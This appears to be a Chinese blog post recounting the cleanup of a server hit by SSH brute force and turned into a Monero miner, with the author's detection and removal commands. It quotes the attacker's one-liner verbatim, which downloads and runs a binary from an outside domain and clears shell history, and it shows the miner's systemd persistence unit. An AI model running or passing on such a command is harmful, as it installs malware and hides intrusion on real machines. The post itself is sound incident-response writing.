马上行动,强化服务器密码!记录一次紧急清理挖矿程序的过程

早上浪费了一些时间处理本可避免的事,幸好有AI帮忙,不然需要更久才能处理好。自以为密码很安全,但还是低估了攻击者。如果你也有暴露在公网的服务器,记得提升一下安全级别,如果有疑问也欢迎交流。

图片

一、异常登录情况

早上收到云安全中心的短信通知,存在暴力破解密码成功并在非常用地登录报警。

Image

恶意代码部署和执行

在云安全中心可以看到攻击者登录后,执行了一系列危险命令:

bash -c cd /usr/bin; rm -rf ddaemon; curl -O http://dow.luotuoxiangzi.cc/ddaemon; chmod 775 ddaemon; ./ddaemon; history -c;

这个命令序列执行了以下危险操作:

  1. cd /usr/bin - 进入系统二进制文件目录,这是个系统关键路径
  2. rm -rf ddaemon - 删除可能已存在的同名文件(可能是先前感染的清理)
  3. curl -O http://dow.luotuoxiangzi.cc/ddaemon - 从可疑域名下载恶意程序
  4. chmod 775 ddaemon - 设置可执行权限
  5. ./ddaemon - 立即执行下载的恶意程序
  6. history -c - 清除命令历史记录以隐藏攻击痕迹

二、查找可疑服务

为查找可疑服务,执行了以下操作:

systemctl list-unit-files | grep enabled

该命令用于列出所有已启用的系统服务,以便发现可能被攻击者添加的可疑服务。

find /usr/bin /usr/sbin /bin /sbin -type f -mtime -7 | xargs ls -la

该命令查找过去 7 天内被修改的文件,特别是系统二进制文件目录中的文件,以确定是否有被篡改的迹象。

借助 AI 进行分析可疑系统服务,攻击者主要通过替换ddaemon程序作为后台恶意程序,并添加了c3pool和networkxm服务。这些服务是重点清理对象。

Image

三、清理挖矿程序

攻击者部署的挖矿程序以服务形式运行,主程序位于/usr/workspace/xmrig。以下是相关服务的配置信息:

cat /etc/systemd/system/c3pool_miner.service[Unit]Description=Monero miner service[Service]ExecStart=/usr/workspace/xmrig --config=/usr/workspace/config.jsonRestart=alwaysNice=10CPUWeight=1[Install]WantedBy=multi-user.target

为清理挖矿程序,执行了以下操作:

sudo systemctl stop c3pool_miner.servicesudo systemctl disable c3pool_miner.servicesudo systemctl status c3pool_miner.servicesudo systemctl stop networkxm.servicesudo systemctl disable networkxm.servicesudo systemctl status networkxm.service

处理方案参考 AI 给的方案就可以了。

图片

四、检查登录行为

修复密码后,仍发现有尝试登录的行为。为检查登录尝试,执行了以下命令:

sudo cat /var/log/secure | grep "Failed password" | tail -20

该命令查看了最近 20 次失败的登录尝试,以确定是否有持续的攻击行为。

Image

五、关于 xmrig 的说明

挖矿软件:XMRig 6.22.0-C5(门罗币挖矿工具),支持多种算法。

Image

Image

六、总结与建议

攻击者通过暴力破解密码成功入侵,并部署了恶意代码和挖矿程序。通过上述清理措施,已成功移除恶意程序和服务,恢复了服务器的正常运行。

图片

AI相关阅读

从零到一:打造你的专属小红书数据采集神器,轻松搞定笔记采集

AI 编程如何让你轻松采集网站数据?

教学的新革命!大模型生成讲解,Manim 打造动画视频

从 AI 生成试卷到专业 Word 排版:MD2WD 高效解决方案

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值